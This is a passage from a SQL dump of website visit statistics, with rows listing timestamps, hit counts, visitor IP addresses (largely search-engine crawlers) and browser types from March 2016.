other'),(28633,1459281589,1,1,0,0,'151.80.31.161','other'),(28634,1459281604,1,0,1,0,'66.249.69.85',''),(28635,1459281628,1,1,0,0,'51.255.65.78','other'),(28636,1459281656,1,1,0,0,'217.69.133.224','other'),(28637,1459282300,1,1,0,0,'217.69.133.240','other'),(28638,1459282397,3,1,2,0,'66.249.69.77',''),(28639,1459282405,1,1,0,0,'164.132.161.31','other'),(28640,1459282588,1,1,0,0,'217.69.136.207','other'),(28641,1459282791,1,1,0,0,'159.224.151.230','other'),(28642,1459282792,1,1,0,0,'164.132.161.79','other'),(28643,1459282832,2,0,2,0,'66.249.69.85',''),(28644,1459282891,1,1,0,0,'217.69.133.67','other'),(28645,1459283007,1,0,1,0,'66.249.69.162',''),(28646,1459283271,1,1,0,0,'217.69.133.84','other'),(28647,1459283348,1,0,1,0,'66.249.69.77',''),(28648,1459283424,1,1,0,0,'180.76.15.154','other'),(28649,1459283568,1,0,1,0,'66.249.69.93',''),(28650,1459283636,2,2,0,0,'66.249.69.162','other'),(28651,1459283880,1,1,0,0,'151.80.31.107','other'),(28652,1459283987,1,1,0,0,'151.0.26.161','msie'),(28653,1459284035,1,1,0,0,'217.69.133.249','other'),(28654,1459284660,1,1,0,0,'130.180.208.65','chrome'),(28655,1459284739,1,1,0,0,'157.55.39.165','other'),(28656,1459284841,1,0,1,0,'66.249.69.93',''),(28657,1459284899,1,0,1,0,'66.249.69.85',''),(28658,1459285211,1,0,1,0,'68.180.231.29',''),(28659,1459285303,1,1,0,0,'217.69.133.220','other'),(28660,1459285318,1,1,0,0,'217.69.133.232','other'),(28661,1459285548,1,1,0,0,'217.69.133.70','other'),(28662,1459285822,1,1,0,0,'217.69.133.217','other'),(28663,1459285882,2,2,0,0,'91.237.52.174','other'),(28664,1459285910,1,1,0,0,'91.237.52.174','firefox'),(28665,1459286059,3,0,3,0,'66.249.69.85',''),(28666,1459286069,5,0,5,0,'66.249.69.77',''),(28667,1459286145,1,0,1,0,'66.249.69.162',''),(28668,1459286583,1,1,0,0,'51.255.65.64','other'),(28669,1459286814,1,1,0,0,'217.69.133.225','other'),(28670,1459286815,1,1,0,0,'217.69.133.222','other'),(28671,1459287545,1,1,0,0,'40.77.167.26','other'),(28672,1459288061,1,1,0,0,'217.69.133.238','other'),(28673,1459288120,1,0,1,0,'66.249.69.93',''),(28674,1459288179,2,0,2,0,'66.249.69.85',''),(28675,1459288384,1,0,1,0,'66.249.69.77',''),(28676,1459288774,1,1,0,0,'217.69.133.218','other'),(28677,1459289132,1,1,0,0,'217.69.133.236','other'),(28678,1459289397,1,0,1,0,'66.249.69.162',''),(28679,1459289465,1,1,0,0,'217.69.133.230','other'),(28680,1459289466,1,1,0,0,'217.69.133.231','other'),(28681,1459289512,1,1,0,0,'66.249.91.45','other'),(28682,1459289656,1,0,1,0,'66.249.69.85',''),(28683,1459290027,1,0,1,0,'66.249.69.93',''),(28684,1459290361,1,1,0,0,'40.77.167.0','other'),(28685,1459290457,2,0,2,0,'68.180.231.29',''),(28686,1459290615,1,1,0,0,'217.69.133.239','other'),(28687,1459290655,1,1,0,0,'217.69.133.220','other'),(28688,1459290905,2,2,0,0,'66.249.69.162','other'),(28689,1459291156,1,1,0,0,'66.249.69.77','other'),(28690,1459291187,1,1,0,0,'217.69.133.28','other'),(28691,1459291188,1,1,0,0,'217.69.133.29','other'),(28692,1459291189,1,1,0,0,'217.69.133.60','other'),(28693,1459291473,1,1,0,0,'8.29.198.25','other'),(28694,1459292070,1,1,0,0,'62.210.215.100','chrome'),(28695,1459292111,1,0,1,0,'68.180.231.29',''),(28696,1459292142,1,1,0,0,'130.193.50.34','other'),(28697,1459292166,1,1,0,0,'66.249.69.93','other'),(28698,1459292458,1,1,0,0,'130.193.51.83','other'),(28699,1459292506,1,0,1,0,'66.249.69.77',''),(28700,1459292552,4,4,0,0,'69.30.215.142','other'),(28701,1459292591,1,1,0,0,'217.69.133.249','other'),(28702,1459292979,102,102,0,0,'69.30.234.186','other'),(28703,1459293040,1,1,0,0,'62.210.215.100','chrome'),(28704,1459293129,1,1,0,0,'141.8.142.61','other'),(28705,1459293567,2,0,2,0,'66.249.69.93',''),(28706,1459293863,1,1,0,0,'130.193.50.6','other'),(28707,1459293998,1,1,0,0,'40.77.167.0','other'),(28708,1459294135,2,2,0,0,'217.69.133.85','other'),(28709,1459294136,1,1,0,0,'217.69.133.217','other'),(28710,1459294266,2,1,1,0,'66.249.69.77',''),(28711,1459294615,1,1,0,0,'141.8.132.10','other'),(28712,1459294619,2,2,0,0,'141.8.183.25','other'),(28713,1459294623,1,1,0,0,'141.8.142.67','other'),(28714,1459295274,1,1,0,0,'217.69.133.231','other'),(28715,1459295337,1,0,1,0,'68.180.231.29',''),(28716,1459296028,1,0,1,0,'66.249.69.85',''),(28717,1459296121,1,1,0,0,'217.69.133.215','other'),(28718,1459296303,6,4,2,0,'66.249.69.77',''),(28719,1459296306,1,1,0,0,'141.8.142.58','other'),(28720,1459296309,1,1,0,0,'130.193.50.34','other'),(28721,1459296313,1,1,0,0,'130.193.37.7','other'),(28722,1459296479,3,1,2,0,'66.249.69.85',''),(28723,1459296505,3,0,3,0,'66.249.69.93',''),(28724,1459296631,1,1,0,0,'217.69.133.242','other'),(28725,1459296633,1,1,0,0,'217.69.133.244','other'),(28726,1459296674,20,20,0,0,'62.210.143.245','other'),(28727,1459296894,2,2,0,0,'5.255.253.113','other'),(28728,1459296901,1,1,0,0,'178.154.189.31','other'),(28729,1459296905,1,1,0,0,'5.255.253.67','other'),(28730,1459297149,1,1,0,0,'217.69.133.237','other'),(28731,1459297434,1,0,1,0,'66.249.69.77',''),(28732,1459297447,1,1,0,0,'51.255.65.69','other'),(28733,1459297732,1,1,0,0,'5.255.253.9','other'),(28734,1459297824,1,1,0,0,'217.69.133.226','other'),(28735,1459298340,1,1,0,0,'151.80.31.162','other'),(28736,1459298539,1,1,0,0,'217.69.133.67','other'),(28737,1459298566,1,1,0,0,'141.8.142.85','other'),(28738,1459298602,1,1,0,0,'157.55.39.165','other'),(28739,1459298755,3,0,3,0,'66.249.69.93',''),(28740,1459298889,2,0,2,0,'66.249.69.85',''),(28741,1459298900,15,0,15,0,'66.249.69.77',''),(28742,1459298914,1,0,1,0,'66.249.69.150',''),(28743,1459299266,1,1,0,0,'130.193.51.83','other'),(28744,1459299270,1,1,0,0,'141.8.132.105','other'),(28745,1459299470,1,1,0,0,'151.80.31.106','other'),(28746,1459299631,1,0,1,0,'66.249.69.162',''),(28747,1459299770,1,0,1,0,'66.249.69.93',''),(28748,1459299836,5,0,5,0,'66.249.69.85',''),(28749,1459299883,2,2,0,0,'217.69.133.235','other'),(28750,1459299987,1,1,0,0,'157.55.39.165','other'),(28751,1459300147,1,1,0,0,'217.69.133.222','other'),(28753,1459300286,1,1,0,0,'130.193.51.19','other'),(28754,1459300381,1,0,1,0,'68.180.231.29',''),(28755,1459300448,5,4,1,0,'66.249.69.77',''),(28756,1459300597,3,3,0,0,'66.249.69.85','other'),(28757,1459300627,1,1,0,0,'151.80.31.171','other'),(28758,1459300749,1,1,0,0,'66.249.91.41','other'),(28759,1459300963,1,1,0,0,'217.69.133.84','other'),(28760,1459301121,5,2,3,0,'66.249.69.77',''),(28761,1459301279,1,1,0,0,'141.8.132.105','other'),(28762,1459301283,1,1,0,0,'93.158.152.84','other'),(28763,1459301287,1,1,0,0,'130.193.50.6','other'),(28764,1459301291,1,1,0,0,'93.158.152.40','other'),(28765,1459301295,1,1,0,0,'141.8.142.85','other'),(28766,1459301299,1,1,0,0,'93.158.152.9','other'),(28767,1459301303,1,1,0,0,'5.255.253.113','other'),(28768,1459301307,1,1,0,0,'178.154.149.10','other'),(28769,1459301559,1,1,0,0,'217.69.133.229','other'),(28770,1459301585,37,37,0,0,'157.55.39.165','other'),(28771,1459301597,1,1,0,0,'217.69.133.9','other'),(28772,1459301612,26,26,0,0,'40.77.167.35','other'),(28773,1459301817,1,1,0,0,'217.69.133.228','other'),(28774,1459301987,2,1,1,0,'66.249.69.77',''),(28775,1459302243,1,0,1,0,'66.249.69.93',''),(28776,1459302277,1,1,0,0,'8.29.198.26','other'),(28777,1459302429,1,1,0,0,'180.76.15.139','other'),(28778,1459302450,1,1,0,0,'130.193.51.43','other'),(28779,1459302474,1,1,0,0,'180.76.15.142','other'),(28780,1459302723,3,0,3,0,'68.180.231.29',''),(28781,1459302862,2,2,0,0,'141.8.132.83','other'),(28782,1459303074,1,0,1,0,'66.249.69.156',''),(28783,1459303083,1,1,0,0,'66.249.69.162','other'),(28784,1459303216,5,0,5,0,'66.249.69.85',''),(28785,1459303430,4,0,4,0,'66.249.69.77',''),(28786,1459303572,1,1,0,0,'141.8.184.11','other'),(28787,1459303959,2,2,0,0,'130.193.50.34','other'),(28788,1459304202,1,0,1,0,'66.249.69.85',''),(28789,1459304790,1,1,0,0,'141.8.132.105','other'),(28790,1459304886,1,1,0,0,'217.69.133.223','other'),(28791,1459304887,1,1,0,0,'217.69.133.225','other'),(28792,1459305233,1,1,0,0,'141.8.142.67','other'),(28793,1459305433,1,0,1,0,'66.249.69.77',''),(28794,1459305512,2,2,0,0,'217.69.133.231','other'),(28795,1459305540,3,0,3,0,'66.249.69.85',''),(28796,1459305649,1,1,0,0,'5.255.253.113','other'),(28797,1459305748,1,0,1,0,'68.180.231.29',''),(28798,1459305818,1,1,0,0,'217.69.133.223','other'),(28800,1459305819,1,1,0,0,'217.69.133.222','other'),(28801,1459306531,1,1,0,0,'5.255.253.10','other'),(28802,1459306535,1,1,0,0,'5.255.253.68','other'),(28803,1459306539,1,1,0,0,'141.8.142.85','other'),(28804,1459306551,1,1,0,0,'164.132.161.22','other'),(28805,1459306838,2,2,0,0,'217.69.133.193','other'),(28806,1459306842,1,1,0,0,'141.8.142.61','other'),(28807,1459307066,1,1,0,0,'164.132.161.32','other'),(28808,1459307218,2,0,2,0,'66.249.69.93',''),(28809,1459307232,1,1,0,0,'217.69.133.59','other'),(28810,1459307233,1,1,0,0,'217.69.133.28','other'),(28811,1459307277,2,2,0,0,'141.8.132.105','other'),(28812,1459307281,1,1,0,0,'217.69.133.235','other'),(28813,1459307292,6,6,0,0,'130.193.50.34','other'),(28814,1459307303,2,2,0,0,'141.8.183.25','other'),(28815,1459307315,4,4,0,0,'130.193.51.83','other'),(28816,1459307366,2,2,0,0,'5.255.253.113','other'),(28817,1459307627,1,1,0,0,'217.69.133.240','other'),(28818,1459307896,1,1,0,0,'217.69.133.231','other'),(28819,1459307897,2,2,0,0,'217.69.133.69','other'),(28820,1459307952,1,1,0,0,'217.69.133.220','other'),(28821,1459307954,1,1,0,0,'217.69.133.68','other'),(28822,1459307977,1,1,0,0,'157.55.39.165','other'),(28823,1459308127,1,0,1,0,'66.249.69.85',''),(28824,1459308251,1,1,0,0,'66.249.69.85','other'),(28825,1459308465,1,1,0,0,'217.69.133.226','other'),(28826,1459308466,1,1,0,0,'217.69.133.222','other'),(28827,1459308472,2,0,2,0,'66.249.69.77',''),(28828,1459308685,4,0,4,0,'66.249.69.93',''),(28829,1459308883,1,1,0,0,'130.193.51.83','other'),(28830,1459308930,1,1,0,0,'141.8.142.58','other'),(28831,1459308951,1,1,0,0,'5.255.253.113','other'),(28832,1459309558,1,0,1,0,'66.249.69.85',''),(28833,1459309614,6,0,6,0,'66.249.69.77',''),(28834,1459309792,1,1,0,0,'141.8.132.105','other'),(28835,1459309812,1,1,0,0,'217.69.133.219','other'),(28836,1459309900,2,0,2,0,'66.249.69.93',''),(28837,1459310131,1,1,0,0,'164.132.161.6','other'),(28838,1459310141,1,1,0,0,'171.25.193.78','chrome'),(28839,1459310504,1,1,0,0,'141.8.132.41','other'),(28840,1459311093,1,1,0,0,'66.249.91.45','other'),(28841,1459311157,1,1,0,0,'217.69.133.232','other'),(28842,1459311158,2,2,0,0,'217.69.133.231','other'),(28843,1459311159,1,1,0,0,'217.69.133.229','other'),(28844,1459311305,1,0,1,0,'66.249.69.162',''),(28845,1459311453,1,1,0,0,'141.8.183.25','other'),(28846,1459311457,1,1,0,0,'5.255.253.113','other'),(28847,1459311873,1,1,0,0,'217.69.133.218','other'),(28848,1459311874,1,1,0,0,'217.69.133.219','other'),(28849,1459311923,1,1,0,0,'217.69.133.230','other'),(28850,1459312228,1,1,0,0,'62.210.215.100','chrome'),(28851,1459312250,2,0,2,0,'66.249.69.93',''),(28852,1459312341,1,1,0,0,'217.69.133.225','other'),(28853,1459312342,2,2,0,0,'217.69.133.224','other'),(28854,1459312386,18,18,0,0,'130.193.50.34','other'),(28855,1459312424,1,1,0,0,'217.69.133.235','other'),(28857,1459312425,1,1,0,0,'217.69.133.240','other'),(28858,1459312432,2,2,0,0,'217.69.133.221','other'),(28859,1459312852,4,4,0,0,'141.8.132.105','other'),(28860,1459312915,1,1,0,0,'5.255.253.113','other'),(28861,1459313016,1,0,1,0,'66.249.69.85',''),(28862,1459313023,1,1,0,0,'66.249.69.85','other'),(28863,1459313098,1,1,0,0,'8.29.198.25','other'),(28864,1459313463,2,2,0,0,'130.193.50.34','other'),(28865,1459314350,1,1,0,0,'217.69.133.69','other'),(28866,1459314837,1,1,0,0,'151.80.31.173','other'),(28867,1459314975,1,0,1,0,'66.249.69.77',''),(28868,1459315026,1,1,0,0,'217.69.133.223','other'),(28869,1459315109,1,0,1,0,'66.249.69.93',''),(28870,1459315286,1,0,1,0,'66.249.69.85',''),(28871,1459315355,1,0,1,0,'68.180.231.29',''),(28872,1459315510,2,2,0,0,'130.193.50.34','other'),(28873,1459315519,1,1,0,0,'141.8.132.105','other'),(28874,1459315670,1,1,0,0,'51.255.65.25','other'),(28875,1459315802,1,1,0,0,'40.77.167.26','other'),(28876,1459316069,1,1,0,0,'151.80.31.107','other'),(28877,1459316206,1,0,1,0,'66.249.69.85',''),(28878,1459316287,1,1,0,0,'66.249.93.67','chrome'),(28879,1459316404,1,1,0,0,'91.196.178.66','firefox'),(28880,1459316621,1,1,0,0,'217.69.133.224','other'),(28881,1459316709,1,1,0,0,'164.132.161.34','other'),(28882,1459316720,1,1,0,0,'217.69.133.3','other'),(28883,1459316733,1,0,1,0,'66.249.69.93',''),(28884,1459316901,1,1,0,0,'178.154.189.202','other'),(28885,1459317046,1,1,0,0,'164.132.161.9','other'),(28886,1459317053,1,0,1,0,'66.249.69.162',''),(28887,1459317061,1,1,0,0,'217.69.133.70','other'),(28888,1459317062,1,1,0,0,'217.69.133.236','other'),(28889,1459317063,1,1,0,0,'217.69.133.239','other'),(28890,1459317441,2,2,0,0,'217.69.133.229','other'),(28891,1459317497,1,1,0,0,'180.76.15.163','other'),(28892,1459317666,1,1,0,0,'168.235.205.110','other'),(28893,1459317792,1,1,0,0,'217.69.133.232','other'),(28894,1459317836,1,1,0,0,'217.69.133.225','other'),(28896,1459317882,1,1,0,0,'217.69.133.217','other'),(28897,1459317884,1,1,0,0,'217.69.133.216','other'),(28898,1459317885,1,1,0,0,'217.69.133.85','other'),(28899,1459318064,1,0,1,0,'66.249.69.93',''),(28900,1459318251,1,1,0,0,'37.53.76.152','chrome'),(28901,1459318462,1,1,0,0,'46.211.154.195','other'),(28902,1459318531,1,0,1,0,'66.249.69.77',''),(28903,1459318691,3,3,0,0,'217.69.133.235','other'),(28904,1459318888,3,3,0,0,'217.69.133.232','other'),(28905,1459318889,3,3,0,0,'217.69.133.227','other'),(28906,1459318890,1,1,0,0,'217.69.133.69','other'),(28907,1459318891,1,1,0,0,'217.69.133.230','other'),(28908,1459318946,1,1,0,0,'176.120.61.223','chrome'),(28909,1459319107,1,1,0,0,'217.69.133.240','other'),(28910,1459319111,1,1,0,0,'217.69.133.239','other'),(28911,1459319152,1,1,0,0,'217.69.133.68','other'),(28913,1459319229,1,1,0,0,'91.196.178.168','firefox'),(28914,1459319594,1,1,0,0,'62.210.215.100','chrome'),(28915,1459319684,1,1,0,0,'46.211.5.67','other'),(28916,1459320069,1,1,0,0,'37.55.101.157','chrome'),(28917,1459320177,1,0,1,0,'66.249.69.156',''),(28918,1459320198,1,0,1,0,'68.180.231.29',''),(28919,1459320222,1,0,1,0,'66.249.69.93',''),(28920,1459320282,1,1,0,0,'217.69.136.206','other'),(28921,1459320283,1,1,0,0,'217.69.136.207','other'),(28922,1459320405,1,1,0,0,'178.94.172.181','chrome'),(28923,1459320873,1,1,0,0,'91.196.178.101','chrome'),(28924,1459320896,1,1,0,0,'91.196.178.37','chrome'),(28925,1459320991,1,1,0,0,'157.55.39.165','other'),(28926,1459321121,1,0,1,0,'66.249.69.85',''),(28927,1459321388,1,1,0,0,'217.69.133.219','other'),(28928,1459321389,1,1,0,0,'217.69.133.85','other'),(28929,1459321392,1,1,0,0,'66.249.91.41','other'),(28930,1459321423,1,1,0,0,'40.77.167.26','other'),(28931,1459321843,1,1,0,0,'217.69.133.68','other'),(28933,1459321931,1,1,0,0,'107.21.1.8','other'),(28934,1459321968,1,0,1,0,'66.249.69.77',''),(28935,1459322190,1,0,1,0,'66.249.69.162',''),(28936,1459322540,2,2,0,0,'217.69.133.194','other'),(28937,1459322541,1,1,0,0,'217.69.133.9','other'),(28938,1459322542,1,1,0,0,'217.69.133.6','other'),(28939,1459322544,1,1,0,0,'217.69.133.5','other'),(28940,1459322677,1,1,0,0,'217.69.133.240','other'),(28941,1459322748,1,1,0,0,'185.17.124.126','chrome'),(28942,1459322794,3,3,0,0,'217.69.133.229','other'),(28943,1459322834,1,1,0,0,'77.222.155.178','other'),(28944,1459322991,3,3,0,0,'217.69.133.85','other'),(28945,1459322992,1,1,0,0,'217.69.133.217','other'),(28946,1459322993,1,1,0,0,'217.69.133.215','other'),(28947,1459323200,1,1,0,0,'91.240.48.126','firefox'),(28948,1459323314,1,0,1,0,'66.249.69.156',''),(28949,1459323465,1,1,0,0,'217.69.133.222','other'),(28951,1459323498,3,3,0,0,'217.69.133.232','other'),(28952,1459323725,1,1,0,0,'217.69.133.238','other'),(28953,1459323970,1,0,1,0,'68.180.231.29',''),(28954,1459323982,1,1,0,0,'8.29.198.26','other'),(28955,1459324103,2,2,0,0,'91.196.178.68','firefox'),(28956,1459324337,1,1,0,0,'217.69.133.240','other'),(28957,1459324338,1,1,0,0,'217.69.133.236','other'),(28958,1459324340,1,1,0,0,'217.69.133.235','other'),(28959,1459324614,1,1,0,0,'37.52.23.53','chrome'),(28960,1459324686,1,1,0,0,'217.69.133.84','other'),(28961,1459324696,1,1,0,0,'217.69.133.225','other'),(28962,1459324802,1,1,0,0,'93.170.32.178','other'),(28963,1459324898,1,1,0,0,'168.235.205.110','other'),(28964,1459324990,3,3,0,0,'217.69.133.221','other'),(28965,1459325173,3,0,3,0,'66.249.69.77',''),(28966,1459325292,1,0,1,0,'66.249.69.85',''),(28967,1459325381,1,1,0,0,'217.69.133.67','other'),(28969,1459325382,1,1,0,0,'217.69.133.217','other'),(28970,1459325383,1,1,0,0,'217.69.133.215','other'),(28971,1459325446,1,0,1,0,'66.249.69.93',''),(28972,1459325470,1,1,0,0,'46.201.240.112','firefox'),(28973,1459325547,1,1,0,0,'91.196.178.163','chrome'),(28974,1459325596,1,1,0,0,'212.26.134.106','chrome'),(28975,1459325844,1,1,0,0,'130.193.50.34','other'),(28976,1459325885,1,1,0,0,'94.179.110.73','firefox'),(28977,1459325992,1,1,0,0,'91.196.178.130','chrome'),(28978,1459326123,2,2,0,0,'109.173.125.227','chrome'),(28979,1459326917,6,5,1,0,'66.249.69.77',''),(28980,1459326925,1,1,0,0,'91.196.178.66','firefox'),(28981,1459326981,2,2,0,0,'46.211.155.18','other'),(28982,1459327053,1,1,0,0,'94.179.112.226','chrome'),(28983,1459327069,4,2,2,0,'66.249.69.85',''),(28984,1459327894,1,1,0,0,'91.196.178.66','firefox'),(28985,1459327971,1,1,0,0,'94.179.70.120','firefox'),(28986,1459328215,3,0,3,0,'66.249.69.77',''),(28987,1459328279,1,0,1,0,'66.249.69.162',''),(28988,1459328345,2,2,0,0,'109.173.125.227','chrome'),(28989,1459328349,1,1,0,0,'217.69.133.229','other'),(28990,1459328616,1,1,0,0,'217.69.133.223','other'),(28991,1459328617,1,1,0,0,'217.69.133.224','other'),(28992,1459328680,2,0,2,0,'66.249.69.93',''),(28993,1459328729,3,3,0,0,'217.69.133.219','other'),(28994,1459328988,1,1,0,0,'217.69.133.240','other'),(28995,1459328989,1,1,0,0,'217.69.133.70','other'),(28996,1459329037,12,12,0,0,'157.55.39.165','other'),(28997,1459329039,1,1,0,0,'217.69.133.231','other'),(28998,1459329041,2,2,0,0,'217.69.133.228','other'),(28999,1459329085,2,0,2,0,'68.180.231.29',''),(29000,1459329325,1,1,0,0,'91.196.178.68','firefox'),(29001,1459329535,8,8,0,0,'40.77.167.0','other'),(29002,1459329542,5,5,0,0,'40.77.167.26','other'),(29003,1459329561,1,0,1,0,'66.249.69.77',''),(29004,1459329573,2,1,1,0,'66.249.69.77',''),(29005,1459329614,9,9,0,0,'40.77.167.35','other'),(29006,1459329740,2,0,2,0,'66.249.69.93',''),(29007,1459330190,1,1,0,0,'217.69.133.229','other'),(29008,1459330266,1,0,1,0,'66.249.69.85',''),(29009,1459330512,1,1,0,0,'217.69.133.235','other'),(29010,1459330537,1,1,0,0,'217.69.133.222','other'),(29011,1459330619,1,1,0,0,'217.69.133.219','other'),(29012,1459330648,1,1,0,0,'217.69.133.226','other'),(29013,1459330860,1,0,1,0,'68.180.229.103',''),(29014,1459331323,1,1,0,0,'217.69.133.231','other'),(29015,1459331765,1,1,0,0,'217.69.133.84','other'),(29016,1459331767,1,1,0,0,'217.69.133.216','other'),(29017,1459331768,1,1,0,0,'217.69.133.219','other'),(29018,1459331778,2,0,2,0,'68.180.231.29',''),(29019,1459331808,1,0,1,0,'66.249.69.93',''),(29020,1459332182,1,1,0,0,'66.249.91.37','other'),(29021,1459332211,1,0,1,0,'66.249.69.77',''),(29022,1459332446,1,1,0,0,'91.196.178.35','firefox'),(29023,1459332688,1,1,0,0,'94.179.8.60','chrome'),(29024,1459332815,1,1,0,0,'217.69.133.85','other'),(29025,1459332816,2,2,0,0,'217.69.133.219','other'),(29027,1459332817,2,2,0,0,'217.69.133.217','other'),(29028,1459332951,1,1,0,0,'141.8.184.11','other'),(29029,1459332955,2,2,0,0,'178.154.189.31','other'),(29030,1459332959,1,1,0,0,'141.8.132.99','other'),(29031,1459332963,2,2,0,0,'141.8.183.19','other'),(29032,1459332969,1,1,0,0,'93.158.152.51','other'),(29033,1459332973,1,1,0,0,'141.8.142.85','other'),(29034,1459332981,1,1,0,0,'93.158.152.26','other'),(29035,1459332986,1,1,0,0,'141.8.142.25','other'),(29036,1459332990,1,1,0,0,'130.193.50.38','other'),(29037,1459332994,1,1,0,0,'93.158.152.61','other'),(29038,1459332998,1,1,0,0,'141.8.132.83','other'),(29039,1459333002,2,2,0,0,'5.255.253.47','other'),(29040,1459333007,1,1,0,0,'130.193.51.45','other'),(29041,1459333019,1,1,0,0,'130.193.51.81','other'),(29042,1459333244,2,2,0,0,'217.69.133.225','other'),(29043,1459333245,2,2,0,0,'217.69.133.224','other'),(29045,1459333246,1,1,0,0,'217.69.133.221','other'),(29046,1459333591,1,1,0,0,'94.179.110.73','firefox'),(29047,1459333677,1,1,0,0,'217.69.133.216','other'),(29048,1459333878,2,0,2,0,'66.249.69.93',''),(29049,1459333962,1,1,0,0,'217.69.133.70','other'),(29050,1459333963,1,1,0,0,'217.69.133.240','other'),(29051,1459334139,1,1,0,0,'217.69.133.231','other'),(29052,1459334141,1,1,0,0,'217.69.133.69','other'),(29053,1459334142,1,1,0,0,'217.69.133.233','other'),(29054,1459334161,1,1,0,0,'82.145.211.46','chrome'),(29055,1459334163,1,1,0,0,'82.145.211.46','opera'),(29056,1459334490,2,2,0,0,'217.69.133.237','other'),(29057,1459334492,1,1,0,0,'217.69.133.235','other'),(29058,1459334594,1,0,1,0,'66.249.78.99',''),(29059,1459334675,1,0,1,0,'66.249.78.58',''),(29060,1459334763,1,0,1,0,'68.180.229.103',''),(29061,1459334773,1,1,0,0,'217.69.133.67','other'),(29062,1459334774,2,2,0,0,'217.69.133.217','other'),(29064,1459334776,1,1,0,0,'217.69.133.215','other'),(29065,1459334799,1,1,0,0,'8.29.198.25','other'),(29066,1459334877,1,1,0,0,'217.69.133.230','other'),(29067,1459335469,19,19,0,0,'130.193.50.34','other'),(29068,1459335477,5,5,0,0,'141.8.132.105','other'),(29069,1459335481,1,1,0,0,'130.193.51.83','other'),(29070,1459335557,1,1,0,0,'62.210.215.100','chrome'),(29071,1459335606,1,1,0,0,'77.47.132.46','chrome'),(29072,1459335627,2,2,0,0,'217.69.133.235','other'),(29073,1459335628,1,1,0,0,'217.69.133.236','other'),(29075,1459335629,1,1,0,0,'217.69.133.239','other'),(29076,1459335721,1,0,1,0,'66.249.78.65',''),(29077,1459335914,1,1,0,0,'130.180.209.27','chrome'),(29078,1459336052,2,2,0,0,'217.69.133.226','other'),(29080,1459336078,1,1,0,0,'217.69.133.68','other'),(29081,1459336079,1,1,0,0,'217.69.133.221','other'),(29082,1459336080,1,1,0,0,'217.69.133.220','other'),(29083,1459336081,1,1,0,0,'217.69.133.222','other'),(29084,1459336082,1,1,0,0,'217.69.133.225','other'),(29086,1459336138,1,0,1,0,'66.249.78.135',''),(29087,1459336218,1,1,0,0,'217.69.133.216','other'),(29088,1459336219,1,1,0,0,'217.69.133.85','other'),(29089,1459336366,1,1,0,0,'164.132.161.93','other'),(29090,1459336628,1,0,1,0,'66.249.78.65',''),(29091,1459336747,2,2,0,0,'141.8.183.25','other'),(29092,1459336756,1,0,1,0,'66.249.78.58',''),(29093,1459336920,1,1,0,0,'91.196.178.66','firefox'),(29094,1459337110,1,1,0,0,'180.76.15.152','other'),(29095,1459337292,1,1,0,0,'91.196.178.136','firefox'),(29096,1459337356,1,0,1,0,'66.249.78.51',''),(29097,1459337600,1,0,1,0,'66.249.78.65',''),(29098,1459338099,5,5,0,0,'130.193.50.34','other'),(29099,1459338104,5,5,0,0,'141.8.183.25','other'),(29100,1459338109,1,1,0,0,'130.193.51.83','other'),(29101,1459338114,2,2,0,0,'141.8.132.105','other'),(29102,1459338324,1,1,0,0,'66.249.69.156','other'),(29103,1459338335,2,0,2,0,'66.249.69.85',''),(29104,1459338391,1,1,0,0,'217.69.133.218','other'),(29105,1459338393,2,2,0,0,'217.69.133.216','other'),(29106,1459338395,1,1,0,0,'217.69.133.219','other'),(29107,1459338480,1,1,0,0,'217.69.133.68','other'),(29108,1459338481,1,1,0,0,'217.69.133.223','other'),(29109,1459338811,2,2,0,0,'5.255.253.113','other'),(29110,1459338882,1,0,1,0,'66.249.69.93',''),(29111,1459338898,1,1,0,0,'66.249.69.162','other'),(29112,1459339144,2,2,0,0,'217.69.133.228','other'),(29113,1459339145,1,1,0,0,'217.69.133.229','other'),(29114,1459339147,1,1,0,0,'217.69.133.227','other'),(29115,1459339469,1,1,0,0,'164.132.161.47','other'),(29116,1459339509,1,1,0,0,'217.69.133.219','other'),(29117,1459339510,1,1,0,0,'217.69.133.216','other'),(29118,1459339549,1,1,0,0,'217.69.133.9','other'),(29119,1459339599,2,2,0,0,'217.69.133.236','other'),(29120,1459339600,1,1,0,0,'217.69.133.240','other'),(29121,1459339602,1,1,0,0,'217.69.133.238','other'),(29122,1459339657,2,0,2,0,'66.249.69.85',''),(29123,1459339883,1,1,0,0,'51.255.65.42','other'),(29124,1459339885,1,1,0,0,'217.69.133.218','other'),(29125,1459339970,2,2,0,0,'217.69.133.68','other'),(29126,1459339971,2,2,0,0,'217.69.133.222','other'),(29127,1459339973,1,1,0,0,'217.69.133.225','other'),(29128,1459340045,2,2,0,0,'217.69.133.230','other'),(29130,1459340093,1,1,0,0,'141.8.183.25','other'),(29131,1459340142,2,2,0,0,'217.69.133.69','other'),(29132,1459340176,1,0,1,0,'66.249.69.93',''),(29133,1459340268,1,0,1,0,'66.249.69.156',''),(29134,1459340336,2,2,0,0,'217.69.133.70','other'),(29135,1459340439,1,1,0,0,'217.69.136.205','other'),(29136,1459340443,1,1,0,0,'51.255.65.20','other'),(29137,1459340594,2,2,0,0,'66.249.69.156','other'),(29138,1459340629,1,1,0,0,'91.196.178.65','chrome'),(29139,1459340670,1,0,1,0,'66.249.69.77',''),(29140,1459340695,1,1,0,0,'51.255.65.18','other'),(29141,1459340738,1,1,0,0,'141.8.142.61','other'),(29142,1459340820,1,1,0,0,'66.249.69.85','other'),(29143,1459341032,2,2,0,0,'109.173.125.227','chrome'),(29144,1459341127,1,1,0,0,'217.69.133.234','other'),(29145,1459341196,2,2,0,0,'130.193.50.34','other'),(29146,1459341398,1,1,0,0,'91.196.178.72','chrome'),(29147,1459341406,1,1,0,0,'40.77.167.26','other'),(29148,1459341545,1,1,0,0,'66.102.9.68','chrome'),(29149,1459341546,1,1,0,0,'66.249.93.124','chrome'),(29150,1459341564,1,1,0,0,'217.69.133.226','other'),(29151,1459341565,1,1,0,0,'217.69.133.224','other'),(29153,1459341992,1,0,1,0,'66.249.69.93',''),(29154,1459342049,1,0,1,0,'66.249.69.77',''),(29155,1459342367,1,1,0,0,'217.69.133.232','other'),(29157,1459342410,1,1,0,0,'40.77.167.35','other'),(29158,1459342413,2,2,0,0,'141.8.183.25','other'),(29159,1459342417,1,1,0,0,'5.255.253.113','other'),(29160,1459342738,2,0,2,0,'66.249.64.106',''),(29161,1459342742,1,1,0,0,'217.69.133.220','other'),(29163,1459342773,1,0,1,0,'66.249.64.96',''),(29164,1459342790,1,1,0,0,'164.132.161.25','other'),(29165,1459342935,2,0,2,0,'66.249.64.101',''),(29166,1459342975,1,1,0,0,'164.132.161.96','other'),(29167,1459342980,1,1,0,0,'91.196.178.69','firefox'),(29168,1459343050,3,3,0,0,'130.193.